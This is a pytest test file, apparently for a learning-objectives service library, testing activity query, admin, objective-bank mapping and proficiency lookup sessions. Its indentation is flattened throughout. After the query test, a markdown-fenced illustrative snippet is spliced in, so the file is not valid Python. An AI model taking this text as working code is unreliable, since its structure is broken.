def activity_query_session_class_fixture(request):
request.cls.service_config = request.param
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
@pytest.fixture(scope="function")
def activity_query_session_test_fixture(request):
request.cls.activity_list = list()
request.cls.activity_ids = list()
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ActivityQuerySession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
create_form = request.cls.catalog.get_objective_form_for_create([])
        create_form.display_name = 'Test Objective for Activity Query'
        create_form.description = 'Test Objective for ActivityQuerySession tests'
request.cls.objective = request.cls.catalog.create_objective(create_form)
for color in ['Orange', 'Blue', 'Green', 'orange']:
create_form = request.cls.catalog.get_activity_form_for_create(request.cls.objective.ident, [])
create_form.display_name = 'Test Activity ' + color
create_form.description = (
'Test Activity for ActivityQuerySession tests, did I mention green')
obj = request.cls.catalog.create_activity(create_form)
request.cls.activity_list.append(obj)
request.cls.activity_ids.append(obj.ident)
else:
request.cls.catalog = request.cls.svc_mgr.get_activity_query_session(proxy=PROXY)
request.cls.session = request.cls.catalog
def test_tear_down():
if not is_never_authz(request.cls.service_config):
for obj in request.cls.catalog.get_activities():
request.cls.catalog.delete_activity(obj.ident)
request.cls.catalog.delete_objective(request.cls.objective.ident)
request.cls.svc_mgr.delete_objective_bank(request.cls.catalog.ident)
request.addfinalizer(test_tear_down)
@pytest.mark.usefixtures("activity_query_session_class_fixture", "activity_query_session_test_fixture")
class TestActivityQuerySession(object):
"""Tests for ActivityQuerySession"""
def test_get_objective_bank_id(self):
"""Tests get_objective_bank_id"""
# From test_templates/resource.py ResourceLookupSession.get_bin_id_template
if not is_never_authz(self.service_config):
assert self.catalog.get_objective_bank_id() == self.catalog.ident
def test_get_objective_bank(self):
"""Tests get_objective_bank"""
# is this test really needed?
# From test_templates/resource.py::ResourceLookupSession::get_bin_template
if not is_never_authz(self.service_config):
assert isinstance(self.catalog.get_objective_bank(), ABCObjectiveBank)
def test_can_search_activities(self):
"""Tests can_search_activities"""
# From test_templates/resource.py ResourceQuerySession::can_search_resources_template
assert isinstance(self.session.can_search_activities(), bool)
def test_use_federated_objective_bank_view(self):
"""Tests use_federated_objective_bank_view"""
# From test_templates/resource.py ResourceLookupSession.use_federated_bin_view_template
self.catalog.use_federated_objective_bank_view()
def test_use_isolated_objective_bank_view(self):
"""Tests use_isolated_objective_bank_view"""
# From test_templates/resource.py ResourceLookupSession.use_isolated_bin_view_template
self.catalog.use_isolated_objective_bank_view()
def test_get_activity_query(self):
"""Tests get_activity_query"""
# From test_templates/resource.py ResourceQuerySession::get_resource_query_template
query = self.session.get_activity_query()
assert isinstance(query, ABCQueries.ActivityQuery)
def test_get_activities_by_query(self):
"""Tests get_activities_by_query"""
# From test_templates/resource.py ResourceQuerySession::get_resources_by_query_template
# Need to add some tests with string types
if not is_never_authz(self.service_config):
query = self.session.get_activity_query()
query.match_display_name('orange')
assert self.catalog.get_activities_by_query(query).available() == 2
query.clear_display_name_terms()
query.match_display_name('blue', match=False)
assert self.session.get_activities_by_query(query).available() == 3
else:
with pytest.raises(errors.PermissionDenied):
self.session.get_activities_by_query(FakeQuery())
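# test_get_activities_by_query depends on case-insensitive display-name
# matching: of the four fixture activities (Orange, Blue, Green, orange), the
# term 'orange' matches two, and excluding 'blue' leaves three. An
# illustrative re-implementation of that matching rule (not the dlkit query
# engine):

```python
names = ['Test Activity Orange', 'Test Activity Blue',
         'Test Activity Green', 'Test Activity orange']


def match_display_name(candidates, term, match=True):
    # Case-insensitive substring match; match=False inverts the selection.
    hits = [n for n in candidates if term.lower() in n.lower()]
    if match:
        return hits
    return [n for n in candidates if n not in hits]


orange_matches = match_display_name(names, 'orange')
not_blue = match_display_name(names, 'blue', match=False)
```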
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def activity_admin_session_class_fixture(request):
request.cls.service_config = request.param
request.cls.activity_list = list()
request.cls.activity_ids = list()
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.fake_id = Id('objective.objective%3Afake%40DLKIT.MIT.EDU')
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ActivityAdminSession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective for Activity Admin'
create_form.description = 'Test Objective for ActivityAdminSession tests'
request.cls.objective = request.cls.catalog.create_objective(create_form)
request.cls.parent_object = request.cls.objective
for num in [0, 1]:
create_form = request.cls.catalog.get_activity_form_for_create(request.cls.objective.ident, [])
create_form.display_name = 'Test Activity ' + str(num)
create_form.description = 'Test Activity for ActivityAdminSession tests'
obj = request.cls.catalog.create_activity(create_form)
request.cls.activity_list.append(obj)
request.cls.activity_ids.append(obj.ident)
request.cls.form = request.cls.catalog.get_activity_form_for_create(request.cls.objective.ident, [])
request.cls.form.display_name = 'new Activity'
request.cls.form.description = 'description of Activity'
request.cls.form.genus_type = NEW_TYPE
request.cls.osid_object = request.cls.catalog.create_activity(request.cls.form)
else:
request.cls.catalog = request.cls.svc_mgr.get_activity_admin_session(proxy=PROXY)
def class_tear_down():
if not is_never_authz(request.cls.service_config):
for catalog in request.cls.svc_mgr.get_objective_banks():
for obj in catalog.get_activities():
catalog.delete_activity(obj.ident)
for obj in catalog.get_objectives():
catalog.delete_objective(obj.ident)
request.cls.svc_mgr.delete_objective_bank(catalog.ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
def activity_admin_session_test_fixture(request):
pass
@pytest.mark.usefixtures("activity_admin_session_class_fixture", "activity_admin_session_test_fixture")
class TestActivityAdminSession(object):
"""Tests for ActivityAdminSession"""
def test_get_objective_bank_id(self):
"""Tests get_objective_bank_id"""
# From test_templates/resource.py ResourceLookupSession.get_bin_id_template
if not is_never_authz(self.service_config):
assert self.catalog.get_objective_bank_id() == self.catalog.ident
def test_get_objective_bank(self):
"""Tests get_objective_bank"""
# is this test really needed?
# From test_templates/resource.py::ResourceLookupSession::get_bin_template
if not is_never_authz(self.service_config):
assert isinstance(self.catalog.get_objective_bank(), ABCObjectiveBank)
def test_can_create_activities(self):
"""Tests can_create_activities"""
# From test_templates/resource.py::ResourceAdminSession::can_create_resources_template
assert isinstance(self.catalog.can_create_activities(), bool)
def test_can_create_activity_with_record_types(self):
"""Tests can_create_activity_with_record_types"""
# From test_templates/resource.py::ResourceAdminSession::can_create_resource_with_record_types_template
assert isinstance(self.catalog.can_create_activity_with_record_types(DEFAULT_TYPE), bool)
def test_get_activity_form_for_create(self):
"""Tests get_activity_form_for_create"""
# From test_templates/learning.py::ActivityAdminSession::get_activity_form_for_create_template
if not is_never_authz(self.service_config):
form = self.catalog.get_activity_form_for_create(self.parent_object.ident, [])
assert isinstance(form, OsidForm)
assert not form.is_for_update()
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_activity_form_for_create(self.fake_id, [])
def test_create_activity(self):
"""Tests create_activity"""
# From test_templates/resource.py::ResourceAdminSession::create_resource_template
from dlkit.abstract_osid.learning.objects import Activity
if not is_never_authz(self.service_config):
assert isinstance(self.osid_object, Activity)
assert self.osid_object.display_name.text == 'new Activity'
assert self.osid_object.description.text == 'description of Activity'
assert self.osid_object.genus_type == NEW_TYPE
with pytest.raises(errors.IllegalState):
self.catalog.create_activity(self.form)
with pytest.raises(errors.InvalidArgument):
self.catalog.create_activity('I Will Break You!')
update_form = self.catalog.get_activity_form_for_update(self.osid_object.ident)
with pytest.raises(errors.InvalidArgument):
self.catalog.create_activity(update_form)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.create_activity('foo')
def test_can_update_activities(self):
"""Tests can_update_activities"""
# From test_templates/resource.py::ResourceAdminSession::can_update_resources_template
assert isinstance(self.catalog.can_update_activities(), bool)
def test_get_activity_form_for_update(self):
"""Tests get_activity_form_for_update"""
# From test_templates/resource.py::ResourceAdminSession::get_resource_form_for_update_template
if not is_never_authz(self.service_config):
form = self.catalog.get_activity_form_for_update(self.osid_object.ident)
assert isinstance(form, OsidForm)
assert form.is_for_update()
with pytest.raises(errors.InvalidArgument):
self.catalog.get_activity_form_for_update(['This is Doomed!'])
with pytest.raises(errors.InvalidArgument):
self.catalog.get_activity_form_for_update(
Id(authority='Respect my Authoritay!',
namespace='learning.Activity',
identifier='1'))
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_activity_form_for_update(self.fake_id)
def test_update_activity(self):
"""Tests update_activity"""
# From test_templates/resource.py::ResourceAdminSession::update_resource_template
if not is_never_authz(self.service_config):
from dlkit.abstract_osid.learning.objects import Activity
form = self.catalog.get_activity_form_for_update(self.osid_object.ident)
form.display_name = 'new name'
form.description = 'new description'
form.set_genus_type(NEW_TYPE_2)
updated_object = self.catalog.update_activity(form)
assert isinstance(updated_object, Activity)
assert updated_object.ident == self.osid_object.ident
assert updated_object.display_name.text == 'new name'
assert updated_object.description.text == 'new description'
assert updated_object.genus_type == NEW_TYPE_2
with pytest.raises(errors.IllegalState):
self.catalog.update_activity(form)
with pytest.raises(errors.InvalidArgument):
self.catalog.update_activity('I Will Break You!')
with pytest.raises(errors.InvalidArgument):
self.catalog.update_activity(self.form)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.update_activity('foo')
def test_can_delete_activities(self):
"""Tests can_delete_activities"""
# From test_templates/resource.py::ResourceAdminSession::can_delete_resources_template
assert isinstance(self.catalog.can_delete_activities(), bool)
def test_delete_activity(self):
"""Tests delete_activity"""
if not is_never_authz(self.service_config):
form = self.catalog.get_activity_form_for_create(self.parent_object.ident, [])
form.display_name = 'new Activity'
form.description = 'description of Activity'
form.set_genus_type(NEW_TYPE)
osid_object = self.catalog.create_activity(form)
self.catalog.delete_activity(osid_object.ident)
with pytest.raises(errors.NotFound):
self.catalog.get_activity(osid_object.ident)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.delete_activity(self.fake_id)
def test_can_manage_activity_aliases(self):
"""Tests can_manage_activity_aliases"""
# From test_templates/resource.py::ResourceAdminSession::can_manage_resource_aliases_template
assert isinstance(self.catalog.can_manage_activity_aliases(), bool)
def test_alias_activity(self):
"""Tests alias_activity"""
# From test_templates/resource.py::ResourceAdminSession::alias_resource_template
if not is_never_authz(self.service_config):
alias_id = Id(self.catalog.ident.namespace + '%3Amy-alias%40ODL.MIT.EDU')
self.catalog.alias_activity(self.osid_object.ident, alias_id)
aliased_object = self.catalog.get_activity(alias_id)
assert aliased_object.ident == self.osid_object.ident
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.alias_activity(self.fake_id, self.fake_id)
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def activity_objective_bank_session_class_fixture(request):
request.cls.service_config = request.param
request.cls.activity_list = list()
request.cls.activity_ids = list()
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.fake_id = Id('objective.objective%3Afake%40DLKIT.MIT.EDU')
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ActivityObjectiveBankSession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective for Activity Lookup'
create_form.description = 'Test Objective for ActivityLookupSession tests'
request.cls.objective = request.cls.catalog.create_objective(create_form)
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank for Assignment'
create_form.description = 'Test ObjectiveBank for ActivityObjectiveBankSession tests assignment'
request.cls.assigned_catalog = request.cls.svc_mgr.create_objective_bank(create_form)
for num in [0, 1, 2]:
create_form = request.cls.catalog.get_activity_form_for_create(request.cls.objective.ident, [])
create_form.display_name = 'Test Activity ' + str(num)
create_form.description = 'Test Activity for ActivityObjectiveBankSession tests'
obj = request.cls.catalog.create_activity(create_form)
request.cls.activity_list.append(obj)
request.cls.activity_ids.append(obj.ident)
request.cls.svc_mgr.assign_activity_to_objective_bank(
request.cls.activity_ids[1], request.cls.assigned_catalog.ident)
request.cls.svc_mgr.assign_activity_to_objective_bank(
request.cls.activity_ids[2], request.cls.assigned_catalog.ident)
def class_tear_down():
if not is_never_authz(request.cls.service_config):
request.cls.svc_mgr.unassign_activity_from_objective_bank(
request.cls.activity_ids[1], request.cls.assigned_catalog.ident)
request.cls.svc_mgr.unassign_activity_from_objective_bank(
request.cls.activity_ids[2], request.cls.assigned_catalog.ident)
for catalog in request.cls.svc_mgr.get_objective_banks():
for obj in catalog.get_activities():
catalog.delete_activity(obj.ident)
for obj in catalog.get_objectives():
catalog.delete_objective(obj.ident)
request.cls.svc_mgr.delete_objective_bank(catalog.ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
def activity_objective_bank_session_test_fixture(request):
request.cls.session = request.cls.svc_mgr
@pytest.mark.usefixtures("activity_objective_bank_session_class_fixture", "activity_objective_bank_session_test_fixture")
class TestActivityObjectiveBankSession(object):
"""Tests for ActivityObjectiveBankSession"""
def test_can_lookup_activity_objective_bank_mappings(self):
"""Tests can_lookup_activity_objective_bank_mappings"""
# From test_templates/resource.py::ResourceBinSession::can_lookup_resource_bin_mappings
result = self.session.can_lookup_activity_objective_bank_mappings()
assert isinstance(result, bool)
def test_use_comparative_objective_bank_view(self):
"""Tests use_comparative_objective_bank_view"""
# From test_templates/resource.py::BinLookupSession::use_comparative_bin_view_template
self.svc_mgr.use_comparative_objective_bank_view()
def test_use_plenary_objective_bank_view(self):
"""Tests use_plenary_objective_bank_view"""
# From test_templates/resource.py::BinLookupSession::use_plenary_bin_view_template
self.svc_mgr.use_plenary_objective_bank_view()
def test_get_activity_ids_by_objective_bank(self):
"""Tests get_activity_ids_by_objective_bank"""
# From test_templates/resource.py::ResourceBinSession::get_resource_ids_by_bin_template
if not is_never_authz(self.service_config):
objects = self.svc_mgr.get_activity_ids_by_objective_bank(self.assigned_catalog.ident)
assert objects.available() == 2
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_activity_ids_by_objective_bank(self.fake_id)
def test_get_activities_by_objective_bank(self):
"""Tests get_activities_by_objective_bank"""
# From test_templates/resource.py::ResourceBinSession::get_resources_by_bin_template
if not is_never_authz(self.service_config):
results = self.session.get_activities_by_objective_bank(self.assigned_catalog.ident)
assert isinstance(results, ABCObjects.ActivityList)
assert results.available() == 2
else:
with pytest.raises(errors.PermissionDenied):
self.session.get_activities_by_objective_bank(self.fake_id)
def test_get_activity_ids_by_objective_banks(self):
"""Tests get_activity_ids_by_objective_banks"""
# From test_templates/resource.py::ResourceBinSession::get_resource_ids_by_bins_template
if not is_never_authz(self.service_config):
catalog_ids = [self.catalog.ident, self.assigned_catalog.ident]
object_ids = self.session.get_activity_ids_by_objective_banks(catalog_ids)
assert isinstance(object_ids, IdList)
# Currently our impl does not remove duplicate objectIds
assert object_ids.available() == 5
else:
with pytest.raises(errors.PermissionDenied):
self.session.get_activity_ids_by_objective_banks([self.fake_id])
def test_get_activities_by_objective_banks(self):
"""Tests get_activities_by_objective_banks"""
# From test_templates/resource.py::ResourceBinSession::get_resources_by_bins_template
if not is_never_authz(self.service_config):
catalog_ids = [self.catalog.ident, self.assigned_catalog.ident]
results = self.session.get_activities_by_objective_banks(catalog_ids)
assert isinstance(results, ABCObjects.ActivityList)
# Currently our impl does not remove duplicate objects
assert results.available() == 5
else:
with pytest.raises(errors.PermissionDenied):
self.session.get_activities_by_objective_banks([self.fake_id])
def test_get_objective_bank_ids_by_activity(self):
"""Tests get_objective_bank_ids_by_activity"""
# From test_templates/resource.py::ResourceBinSession::get_bin_ids_by_resource_template
if not is_never_authz(self.service_config):
cats = self.svc_mgr.get_objective_bank_ids_by_activity(self.activity_ids[1])
assert cats.available() == 2
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_objective_bank_ids_by_activity(self.fake_id)
def test_get_objective_banks_by_activity(self):
"""Tests get_objective_banks_by_activity"""
# From test_templates/resource.py::ResourceBinSession::get_bins_by_resource_template
if not is_never_authz(self.service_config):
cats = self.svc_mgr.get_objective_banks_by_activity(self.activity_ids[1])
assert cats.available() == 2
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_objective_banks_by_activity(self.fake_id)
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def activity_objective_bank_assignment_session_class_fixture(request):
request.cls.service_config = request.param
request.cls.activity_list = list()
request.cls.activity_ids = list()
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.fake_id = Id('objective.objective%3Afake%40DLKIT.MIT.EDU')
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ActivityObjectiveBankAssignmentSession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank for Assignment'
create_form.description = 'Test ObjectiveBank for ActivityObjectiveBankAssignmentSession tests assignment'
request.cls.assigned_catalog = request.cls.svc_mgr.create_objective_bank(create_form)
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective for Assignment'
create_form.description = 'Test Objective for ActivityObjectiveBankAssignmentSession tests assignment'
request.cls.objective = request.cls.catalog.create_objective(create_form)
for num in [0, 1, 2]:
create_form = request.cls.catalog.get_activity_form_for_create(request.cls.objective.ident, [])
create_form.display_name = 'Test Activity ' + str(num)
create_form.description = 'Test Activity for ActivityObjectiveBankAssignmentSession tests'
obj = request.cls.catalog.create_activity(create_form)
request.cls.activity_list.append(obj)
request.cls.activity_ids.append(obj.ident)
def class_tear_down():
if not is_never_authz(request.cls.service_config):
for obj in request.cls.catalog.get_activities():
request.cls.catalog.delete_activity(obj.ident)
for obj in request.cls.catalog.get_objectives():
request.cls.catalog.delete_objective(obj.ident)
request.cls.svc_mgr.delete_objective_bank(request.cls.assigned_catalog.ident)
request.cls.svc_mgr.delete_objective_bank(request.cls.catalog.ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
def activity_objective_bank_assignment_session_test_fixture(request):
request.cls.session = request.cls.svc_mgr
@pytest.mark.usefixtures("activity_objective_bank_assignment_session_class_fixture", "activity_objective_bank_assignment_session_test_fixture")
class TestActivityObjectiveBankAssignmentSession(object):
"""Tests for ActivityObjectiveBankAssignmentSession"""
def test_can_assign_activities(self):
"""Tests can_assign_activities"""
# From test_templates/resource.py::ResourceBinAssignmentSession::can_assign_resources_template
result = self.session.can_assign_activities()
assert isinstance(result, bool)
def test_can_assign_activities_to_objective_bank(self):
"""Tests can_assign_activities_to_objective_bank"""
# From test_templates/resource.py::ResourceBinAssignmentSession::can_assign_resources_to_bin_template
result = self.session.can_assign_activities_to_objective_bank(self.assigned_catalog.ident)
assert isinstance(result, bool)
def test_get_assignable_objective_bank_ids(self):
"""Tests get_assignable_objective_bank_ids"""
# From test_templates/resource.py::ResourceBinAssignmentSession::get_assignable_bin_ids_template
# Note that our implementation just returns all catalogIds, which does not follow
# the OSID spec (it should return only the catalogIds below the given one in the hierarchy).
if not is_never_authz(self.service_config):
results = self.session.get_assignable_objective_bank_ids(self.catalog.ident)
assert isinstance(results, IdList)
# Because we're not deleting all banks from all tests, we might
# have some crufty banks here...but there should be at least 2.
assert results.available() >= 2
else:
with pytest.raises(errors.PermissionDenied):
self.session.get_assignable_objective_bank_ids(self.fake_id)
def test_get_assignable_objective_bank_ids_for_activity(self):
"""Tests get_assignable_objective_bank_ids_for_activity"""
# From test_templates/resource.py::ResourceBinAssignmentSession::get_assignable_bin_ids_for_resource_template
# Note that our implementation just returns all catalogIds, which does not follow
# the OSID spec (it should return only the catalogIds below the given one in the hierarchy).
if not is_never_authz(self.service_config):
results = self.session.get_assignable_objective_bank_ids_for_activity(self.catalog.ident, self.activity_ids[0])
assert isinstance(results, IdList)
# Because we're not deleting all banks from all tests, we might
# have some crufty banks here...but there should be at least 2.
assert results.available() >= 2
else:
with pytest.raises(errors.PermissionDenied):
self.session.get_assignable_objective_bank_ids_for_activity(self.fake_id, self.fake_id)
def test_assign_activity_to_objective_bank(self):
"""Tests assign_activity_to_objective_bank"""
# From test_templates/resource.py::ResourceBinAssignmentSession::assign_resource_to_bin_template
if not is_never_authz(self.service_config):
results = self.assigned_catalog.get_activities()
assert results.available() == 0
self.session.assign_activity_to_objective_bank(self.activity_ids[1], self.assigned_catalog.ident)
results = self.assigned_catalog.get_activities()
assert results.available() == 1
self.session.unassign_activity_from_objective_bank(
self.activity_ids[1],
self.assigned_catalog.ident)
else:
with pytest.raises(errors.PermissionDenied):
self.session.assign_activity_to_objective_bank(self.fake_id, self.fake_id)
def test_unassign_activity_from_objective_bank(self):
"""Tests unassign_activity_from_objective_bank"""
# From test_templates/resource.py::ResourceBinAssignmentSession::unassign_resource_from_bin_template
if not is_never_authz(self.service_config):
results = self.assigned_catalog.get_activities()
assert results.available() == 0
self.session.assign_activity_to_objective_bank(
self.activity_ids[1],
self.assigned_catalog.ident)
results = self.assigned_catalog.get_activities()
assert results.available() == 1
self.session.unassign_activity_from_objective_bank(
self.activity_ids[1],
self.assigned_catalog.ident)
results = self.assigned_catalog.get_activities()
assert results.available() == 0
else:
with pytest.raises(errors.PermissionDenied):
self.session.unassign_activity_from_objective_bank(self.fake_id, self.fake_id)
def test_reassign_activity_to_objective_bank(self):
"""Tests reassign_activity_to_objective_bank"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.reassign_activity_to_objective_bank(True, True, True)
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def proficiency_lookup_session_class_fixture(request):
request.cls.service_config = request.param
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.fake_id = Id('objective.objective%3A000000000000000000000000%40DLKIT.MIT.EDU')
@pytest.fixture(scope="function")
def proficiency_lookup_session_test_fixture(request):
request.cls.proficiency_list = list()
request.cls.proficiency_ids = list()
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ProficiencyLookupSession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
form = request.cls.catalog.get_objective_form_for_create([])
form.display_name = 'Test LO'
objective = request.cls.catalog.create_objective(form)
for color in ['Orange', 'Blue']:
create_form = request.cls.catalog.get_proficiency_form_for_create(objective.ident, AGENT_ID, [])
create_form.display_name = 'Test Proficiency ' + color
create_form.description = (
'Test Proficiency for ProficiencyLookupSession tests, did I mention green')
obj = request.cls.catalog.create_proficiency(create_form)
request.cls.proficiency_list.append(obj)
request.cls.proficiency_ids.append(obj.ident)
else:
request.cls.catalog = request.cls.svc_mgr.get_proficiency_lookup_session(proxy=PROXY)
request.cls.session = request.cls.catalog
def test_tear_down():
if not is_never_authz(request.cls.service_config):
for catalog in request.cls.svc_mgr.get_objective_banks():
for obj in catalog.get_proficiencies():
catalog.delete_proficiency(obj.ident)
for obj in catalog.get_objectives():
catalog.delete_objective(obj.ident)
request.cls.svc_mgr.delete_objective_bank(catalog.ident)
request.addfinalizer(test_tear_down)
@pytest.mark.usefixtures("proficiency_lookup_session_class_fixture", "proficiency_lookup_session_test_fixture")
class TestProficiencyLookupSession(object):
"""Tests for ProficiencyLookupSession"""
def test_get_objective_bank_id(self):
"""Tests get_objective_bank_id"""
# From test_templates/resource.py ResourceLookupSession.get_bin_id_template
if not is_never_authz(self.service_config):
assert self.catalog.get_objective_bank_id() == self.catalog.ident
def test_get_objective_bank(self):
"""Tests get_objective_bank"""
# is this test really needed?
# From test_templates/resource.py::ResourceLookupSession::get_bin_template
if not is_never_authz(self.service_config):
assert isinstance(self.catalog.get_objective_bank(), ABCObjectiveBank)
def test_can_lookup_proficiencies(self):
"""Tests can_lookup_proficiencies"""
# From test_templates/resource.py ResourceLookupSession.can_lookup_resources_template
assert isinstance(self.catalog.can_lookup_proficiencies(), bool)
def test_use_comparative_proficiency_view(self):
"""Tests use_comparative_proficiency_view"""
# From test_templates/resource.py ResourceLookupSession.use_comparative_resource_view_template
self.catalog.use_comparative_proficiency_view()
def test_use_plenary_proficiency_view(self):
"""Tests use_plenary_proficiency_view"""
# From test_templates/resource.py ResourceLookupSession.use_plenary_resource_view_template
self.catalog.use_plenary_proficiency_view()
def test_use_federated_objective_bank_view(self):
"""Tests use_federated_objective_bank_view"""
# From test_templates/resource.py ResourceLookupSession.use_federated_bin_view_template
self.catalog.use_federated_objective_bank_view()
def test_use_isolated_objective_bank_view(self):
"""Tests use_isolated_objective_bank_view"""
# From test_templates/resource.py ResourceLookupSession.use_isolated_bin_view_template
self.catalog.use_isolated_objective_bank_view()
def test_use_effective_proficiency_view(self):
"""Tests use_effective_proficiency_view"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.session.use_effective_proficiency_view()
def test_use_any_effective_proficiency_view(self):
"""Tests use_any_effective_proficiency_view"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.session.use_any_effective_proficiency_view()
def test_get_proficiency(self):
"""Tests get_proficiency"""
# From test_templates/resource.py ResourceLookupSession.get_resource_template
if self.svc_mgr.supports_proficiency_query():
if not is_never_authz(self.service_config):
self.catalog.use_isolated_objective_bank_view()
obj = self.catalog.get_proficiency(self.proficiency_list[0].ident)
assert obj.ident == self.proficiency_list[0].ident
self.catalog.use_federated_objective_bank_view()
obj = self.catalog.get_proficiency(self.proficiency_list[0].ident)
assert obj.ident == self.proficiency_list[0].ident
else:
with pytest.raises(errors.NotFound):
self.catalog.get_proficiency(self.fake_id)
else:
if not is_never_authz(self.service_config):
self.catalog.use_isolated_objective_bank_view()
obj = self.catalog.get_proficiency(self.proficiency_list[0].ident)
assert obj.ident == self.proficiency_list[0].ident
self.catalog.use_federated_objective_bank_view()
obj = self.catalog.get_proficiency(self.proficiency_list[0].ident)
assert obj.ident == self.proficiency_list[0].ident
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_proficiency(self.fake_id)
def test_get_proficiencies_by_ids(self):
"""Tests get_proficiencies_by_ids"""
# From test_templates/resource.py ResourceLookupSession.get_resources_by_ids_template
from dlkit.abstract_osid.learning.objects import ProficiencyList
if self.svc_mgr.supports_proficiency_query():
objects = self.catalog.get_proficiencies_by_ids(self.proficiency_ids)
assert isinstance(objects, ProficiencyList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_proficiencies_by_ids(self.proficiency_ids)
assert isinstance(objects, ProficiencyList)
if not is_never_authz(self.service_config):
assert objects.available() > 0
else:
assert objects.available() == 0
else:
if not is_never_authz(self.service_config):
objects = self.catalog.get_proficiencies_by_ids(self.proficiency_ids)
assert isinstance(objects, ProficiencyList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_proficiencies_by_ids(self.proficiency_ids)
assert objects.available() > 0
assert isinstance(objects, ProficiencyList)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_proficiencies_by_ids(self.proficiency_ids)
def test_get_proficiencies_by_genus_type(self):
"""Tests get_proficiencies_by_genus_type"""
# From test_templates/resource.py ResourceLookupSession.get_resources_by_genus_type_template
from dlkit.abstract_osid.learning.objects import ProficiencyList
if self.svc_mgr.supports_proficiency_query():
objects = self.catalog.get_proficiencies_by_genus_type(DEFAULT_GENUS_TYPE)
assert isinstance(objects, ProficiencyList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_proficiencies_by_genus_type(DEFAULT_GENUS_TYPE)
assert isinstance(objects, ProficiencyList)
if not is_never_authz(self.service_config):
assert objects.available() > 0
else:
assert objects.available() == 0
else:
if not is_never_authz(self.service_config):
objects = self.catalog.get_proficiencies_by_genus_type(DEFAULT_GENUS_TYPE)
assert isinstance(objects, ProficiencyList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_proficiencies_by_genus_type(DEFAULT_GENUS_TYPE)
assert objects.available() > 0
assert isinstance(objects, ProficiencyList)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_proficiencies_by_genus_type(DEFAULT_GENUS_TYPE)
